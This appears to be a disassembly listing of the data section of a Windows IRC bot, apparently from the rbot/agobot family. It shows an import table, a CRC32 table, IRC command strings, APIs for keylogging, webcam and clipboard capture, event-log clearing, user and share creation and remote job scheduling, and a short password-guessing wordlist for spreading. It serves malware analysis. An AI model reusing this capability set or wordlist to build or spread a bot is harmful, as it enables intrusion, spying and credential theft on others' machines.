dword_42B0C4 dd 77E64006h ; DATA XREF: sub_41D779+16E�r
dd 77E76968h, 77EC7C51h
dword_42B0D0 dd 77E74C59h ; DATA XREF: seg000:00414121�r
dword_42B0D4 dd 77E70F89h ; DATA XREF: seg000:00414B2A�r
; sub_417D70+D�r
dword_42B0D8 dd 77E802FCh ; DATA XREF: sub_415825+188�r
; sub_415825+1FA�r ...
dword_42B0DC dd 77E6D75Bh ; DATA XREF: sub_415825+17E�r
; sub_4164A9+FB�r
dword_42B0E0 dd 77F51597h ; DATA XREF: seg000:00419D11�r
; seg000:00419DEF�r ...
dword_42B0E4 dd 77F516F8h ; DATA XREF: seg000:00419BD6�r
; seg000:00419D9F�r ...
dword_42B0E8 dd 77E77CB7h ; DATA XREF: seg000:00419BCC�r
; seg000:00419D6D�r ...
dword_42B0EC dd 77E7F01Ah ; DATA XREF: seg000:00419C14�r
; seg000:00419D7D�r
dword_42B0F0 dd 77E61A54h ; DATA XREF: seg000:00419BDF�r
; seg000:00419DB7�r
dword_42B0F4 dd 77E7C3A5h ; DATA XREF: seg000:00419BC0�r
; seg000:00419D56�r ...
dword_42B0F8 dd 77E80618h ; DATA XREF: sub_41B24B+B6�r
dd 77E78147h
dword_42B100 dd 77E76A60h ; DATA XREF: sub_41ACD0+2D�r
dword_42B104 dd 77E71B14h ; DATA XREF: sub_41AD5A+26�r
dword_42B108 dd 77E7166Fh ; DATA XREF: sub_41AD5A+1D�r
dword_42B10C dd 77E75090h ; DATA XREF: sub_41AD95+69�r
dword_42B110 dd 77E74D76h ; DATA XREF: sub_41AD95+36�r
dword_42B114 dd 77E77797h ; DATA XREF: sub_41AD95+25�r
dword_42B118 dd 77E7011Ah ; DATA XREF: sub_41AE17+96�r
dword_42B11C dd 77E73CE2h ; DATA XREF: sub_41AE17+60�r
dword_42B120 dd 77E668D9h ; DATA XREF: sub_41AEDD+15D�r
dword_42B124 dd 77E76A2Eh ; DATA XREF: sub_41C444+D5�r
dword_42B128 dd 77E7FF65h ; DATA XREF: seg000:0041C8B7�r
dword_42B12C dd 77EB7624h ; DATA XREF: seg000:0041C89D�r
dword_42B130 dd 77E6C29Dh ; DATA XREF: seg000:0041D09B�r
dword_42B134 dd 77E76C1Ah ; DATA XREF: sub_41D779+19E�r
dword_42B138 dd 77E775F1h ; DATA XREF: sub_4284E7+131�r
; sub_4284E7+196�r ...
dword_42B13C dd 77E7176Ch ; DATA XREF: sub_42820C+8�r
dword_42B140 dd 77E7339Ch ; DATA XREF: sub_4281D4+C�r
dword_42B144 dd 77F522F2h ; DATA XREF: sub_427108+30�r
dword_42B148 dd 77E77CC4h ; DATA XREF: seg000:00426F89�r
dword_42B14C dd 77E7C866h ; DATA XREF: sub_426DA0+24�r
; sub_426DA0+128�r ...
dword_42B150 dd 77E641EBh ; DATA XREF: sub_426DA0+19C�r
; sub_429E31+1CD�r
dd 77E73FF9h
dword_42B158 dd 77E7FF2Eh ; DATA XREF: sub_42687B:loc_4268CB�r
; sub_4268F2:loc_426945�r
dword_42B15C dd 77E77EE1h ; DATA XREF: sub_4266BC+B�r
dword_42B160 dd 77E7C9E1h ; DATA XREF: sub_4266BC+C1�r
dword_42B164 dd 77E67702h ; DATA XREF: sub_4266BC:loc_426793�r
dword_42B168 dd 77E9C5B1h ; DATA XREF: sub_4266BC+113�r
dword_42B16C dd 77EB9A84h ; DATA XREF: seg000:00426380�r
dword_42B170 dd 77E781F9h ; DATA XREF: sub_425B55+27�r
; sub_425B55+15B�r ...
dword_42B174 dd 77E77405h ; DATA XREF: sub_425B55+2C3�r
; sub_425B55+344�r ...
dword_42B178 dd 77E7F044h ; DATA XREF: seg000:00425A8C�r
; seg000:00425AE3�r ...
dword_42B17C dd 77E6169Ah ; DATA XREF: seg000:00425B47�r
dd 77E7C9E7h
dword_42B184 dd 77E78406h ; DATA XREF: sub_42418E+FE�r
; sub_42418E+165�r ...
dword_42B188 dd 77E79C3Dh ; DATA XREF: sub_42418E+157�r
; sub_426069+14E�r
dword_42B18C dd 77E7C931h ; DATA XREF: sub_42418E+19C�r
dword_42B190 dd 77E7849Fh ; DATA XREF: sub_422D8A+1C�r
; sub_422F16+93�r ...
dword_42B194 dd 77F5722Fh ; DATA XREF: sub_41E3C2+FD�r
; sub_41E3C2+13D�r ...
dword_42B198 dd 77E6167Bh ; DATA XREF: sub_41F87E+9�r
; seg000:00426F75�r
dword_42B19C dd 77F6183Eh ; DATA XREF: sub_4298DC�r
dword_42B1A0 dd 77E6D706h ; DATA XREF: sub_420383+2E�r
; sub_427277+1F5�r
dword_42B1A4 dd 77E6177Ah ; DATA XREF: start-C3193�r
; sub_42418E+57�r
dword_42B1A8 dd 77E7C938h ; DATA XREF: start:loc_420E19�r
dword_42B1AC dd 77E76E0Bh ; DATA XREF: sub_4210EF+44�r
dword_42B1B0 dd 77E7C726h ; DATA XREF: sub_4210EF+11�r
dword_42B1B4 dd 77E79E34h ; DATA XREF: sub_4211B3+22F�r
dword_42B1B8 dd 77E7980Ah ; DATA XREF: sub_4214CB+7E�r
; sub_421582+52�r ...
dword_42B1BC dd 77E73196h ; DATA XREF: sub_4281F0+C�r
dword_42B1C0 dd 77E7A13Fh ; DATA XREF: sub_422F16+42�r
dword_42B1C4 dd 77E6C703h ; DATA XREF: sub_422F16+2B�r
dword_42B1C8 dd 77E70192h ; DATA XREF: sub_42884D+104�r
align 10h
dword_42B1D0 dd 71AB5A01h ; DATA XREF: sub_41776E+22�r
dword_42B1D4 dd 71AB4122h ; DATA XREF: sub_417688+CD�r
dd 71AB1746h, 71AB401Ch, 71AB3F8Dh
dword_42B1E4 dd 71AB155Ah ; DATA XREF: sub_416311+6E�r
; sub_417688+39�r
dd 71AB3ECEh, 71AB5DE2h, 71AB868Dh
dword_42B1F4 dd 71AB3E5Dh ; DATA XREF: seg000:00411A57�r
; sub_416311+88�r ...
dword_42B1F8 dd 71AB1A6Dh ; DATA XREF: seg000:00411A68�r
; seg000:00411B05�r ...
dword_42B1FC dd 71AB1836h ; DATA XREF: seg000:00411A6E�r
; seg000:00411B0B�r
dword_42B200 dd 71AB1746h ; DATA XREF: seg000:00411A41�r
; sub_416F65+1C7�r
dword_42B204 dd 71AB41DAh ; DATA XREF: seg000:004106DF�r
; seg000:00411A15�r
dword_42B208 dd 71AB5690h ; DATA XREF: seg000:0040FC17�r
dword_42B20C dd 71AB3C22h ; DATA XREF: seg000:0040F780�r
; seg000:00411A21�r ...
dword_42B210 dd 71AB1AF4h ; DATA XREF: sub_40EE6B+12�r
; seg000:00411AE3�r
dword_42B214 dd 71AB1B7Bh ; DATA XREF: sub_4298D6�r
dword_42B218 dd 71AB12F8h ; DATA XREF: seg000:0040D16B�r
; seg000:00411A35�r ...
dword_42B21C dd 71AB1890h ; DATA XREF: seg000:0040D6E3�r
; sub_40ECCD+4C�r
dword_42B220 dd 71AB157Eh ; DATA XREF: sub_40274D+2D73�r
dd 4 dup(0)
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
byte_42B630 db 72h, 62h, 0 ; DATA XREF: seg000:00411AA1�o
byte_42B633 db 0 ; DATA XREF: seg000:00401171�o
; sub_40274D+1CFD�o ...
aSSS db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40123B+58�o
aS db '%s',0 ; DATA XREF: sub_40123B+35�o
; sub_40274D+659�o ...
align 4
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40123B+16�o
; sub_40274D+592�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_40123B+F�o
; sub_40274D+5A1�o
align 4
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_4012D6+C7F�o
align 10h
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_4012D6+C77�o
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_4012D6:loc_401F40�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_4012D6+C15�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_4012D6+C08�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_4012D6+BFB�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_4012D6+BEE�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_4012D6+BE1�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_4012D6+BD9�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_4012D6:loc_401EA2�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_4012D6+B97�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_4012D6+B8F�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_4012D6:loc_401E58�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_4012D6+B3D�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_4012D6+B30�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_4012D6+B23�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_4012D6+B1B�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_4012D6:loc_401DE4�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_4012D6+AD9�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_4012D6+AD1�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_4012D6:loc_401D9A�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_4012D6+A8F�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_4012D6+A87�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_4012D6:loc_401D50�o
align 4
aNetwkstagetinf db 'NetWkstaGetInfo',0 ; DATA XREF: sub_4012D6+9F9�o
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_4012D6+9EC�o
; sub_41B24B+47�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_4012D6+9DF�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_4012D6+9D2�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_4012D6+9C5�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_4012D6+9B8�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_4012D6+9AB�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_4012D6+99E�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_4012D6+991�o
align 10h
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_4012D6+984�o
align 10h
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_4012D6+977�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_4012D6+96F�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_4012D6:loc_401C34�o
; sub_41B24B+3A�o
align 4
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_4012D6+921�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_4012D6+914�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_4012D6+90C�o
align 4
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_4012D6:loc_401BD5�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_4012D6+8D2�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_4012D6+860�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_4012D6+853�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_4012D6+846�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_4012D6+839�o
align 10h
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_4012D6+82C�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_4012D6+81F�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_4012D6+812�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_4012D6+805�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_4012D6+7F8�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_4012D6+7F0�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_4012D6:loc_401AB5�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_4012D6+6A6�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_4012D6+699�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_4012D6+68C�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_4012D6+67F�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_4012D6+672�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_4012D6+665�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_4012D6+658�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_4012D6+64B�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_4012D6+63E�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_4012D6+631�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_4012D6+629�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_4012D6+617�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_4012D6+60A�o
align 10h
aSendto db 'sendto',0 ; DATA XREF: sub_4012D6+5FD�o
align 4
aSend db 'send',0 ; DATA XREF: sub_4012D6+5F0�o
; sub_40274D+44AA�o
align 10h
aNtohl db 'ntohl',0 ; DATA XREF: sub_4012D6+5E3�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_4012D6+5D6�o
align 10h
aHtonl db 'htonl',0 ; DATA XREF: sub_4012D6+5C9�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_4012D6+5BC�o
align 10h
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_4012D6+5AF�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_4012D6+5A2�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_4012D6+595�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_4012D6+588�o
aSocket db 'socket',0 ; DATA XREF: sub_4012D6+57B�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_4012D6+56E�o
align 10h
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_4012D6+561�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_4012D6+554�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_4012D6+547�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_4012D6+53A�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_4012D6+52D�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_4012D6+525�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_4012D6+514�o
align 10h
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_4012D6+4A1�o
align 10h
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_4012D6+494�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_4012D6+487�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_4012D6+47A�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_4012D6+46D�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_4012D6+460�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_4012D6+453�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_4012D6+446�o
align 10h
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_4012D6+43E�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_4012D6:loc_401703�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_4012D6:loc_4016DB�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_4012D6+3AD�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_4012D6+3A0�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_4012D6+393�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_4012D6+386�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_4012D6+379�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_4012D6+36C�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_4012D6+35F�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_4012D6:loc_40162D�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_4012D6+327�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_4012D6+31A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_4012D6:loc_4015E8�o
align 10h
aCleareventloga db 'ClearEventLogA',0 ; DATA XREF: sub_4012D6+2C6�o
align 10h
aOpeneventloga db 'OpenEventLogA',0 ; DATA XREF: sub_4012D6+2B9�o
align 10h
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_4012D6+2AC�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_4012D6+29F�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_4012D6+292�o
align 10h
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_4012D6+285�o
align 10h
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_4012D6+278�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_4012D6+270�o
align 10h
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_4012D6:loc_401535�o
align 10h
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_4012D6+21A�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_4012D6+20D�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_4012D6+200�o
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_4012D6:loc_4014CE�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_4012D6+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_4012D6+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_4012D6+186�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_4012D6+179�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_4012D6+16C�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_4012D6+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_4012D6+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_4012D6+14A�o
align 10h
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_4012D6:loc_40140B�o
; sub_428710+13�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_4012D6:loc_4013DE�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_4012D6+A0�o
align 10h
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_4012D6+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_4012D6+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_4012D6+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_4012D6+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_4012D6+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_4012D6+52�o
align 10h
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_4012D6+45�o
align 10h
aProcess32first db 'Process32First',0 ; DATA XREF: sub_4012D6+38�o
align 10h
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_4012D6+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_4012D6+23�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_4012D6+A�o
align 4
unk_42BF4C db 2Dh ; - ; DATA XREF: sub_401F92+2F2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aDllTestComplet db 'DLL test complete.',0
align 4
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+2CC�o
align 4
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+298�o
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+264�o
align 4
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+230�o
align 4
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_401F92+1FC�o
align 10h
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_401F92+1C8�o
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+194�o
align 4
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_401F92+160�o
align 4
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_401F92+12C�o
align 4
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+F8�o
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+C4�o
align 4
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+90�o
align 4
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+5C�o
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_401F92+28�o
align 4
a__0: ; DATA XREF: seg000:0041108C�o
; sub_412135+24C�o
unicode 0, <.>,0
unk_42C0DC db 2Dh ; - ; DATA XREF: sub_4022F5:loc_4023C2�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aNotSupportedBy db 'not supported by this system',0
align 4
unk_42C10C db 2Dh ; - ; DATA XREF: sub_4022F5:loc_402393�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aUnableToAlloca db 'unable to allocate ARP cache',0
align 4
unk_42C13C db 2Dh ; - ; DATA XREF: sub_4022F5:loc_402349�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheIsEmpt db 'ARP cache is empty',0
align 10h
unk_42C160 db 2Dh ; - ; DATA XREF: sub_4022F5+44�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aErrorGettingAr db 'error getting ARP cache: %d',0
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_4023C9+41�o
; seg000:0040BBF2�o ...
aIntranet db 'intranet',0 ; DATA XREF: seg002:0043C48C�o
align 4
aLan db 'lan',0 ; DATA XREF: seg002:0043C484�o
aMain db 'main',0 ; DATA XREF: seg002:0043C480�o
align 10h
aWinpass db 'winpass',0 ; DATA XREF: seg002:0043C47C�o
aBlank db 'blank',0 ; DATA XREF: seg002:0043C478�o
align 10h
aOffice db 'office',0 ; DATA XREF: seg002:0043C474�o
align 4
aControl db 'control',0 ; DATA XREF: seg002:0043C470�o
aXp db 'xp',0 ; DATA XREF: seg002:0043C46C�o
align 4
aNokia db 'nokia',0 ; DATA XREF: seg002:0043C468�o
align 4
aHp db 'hp',0 ; DATA XREF: seg002:0043C464�o
align 10h
aSiemens db 'siemens',0 ; DATA XREF: seg002:0043C460�o
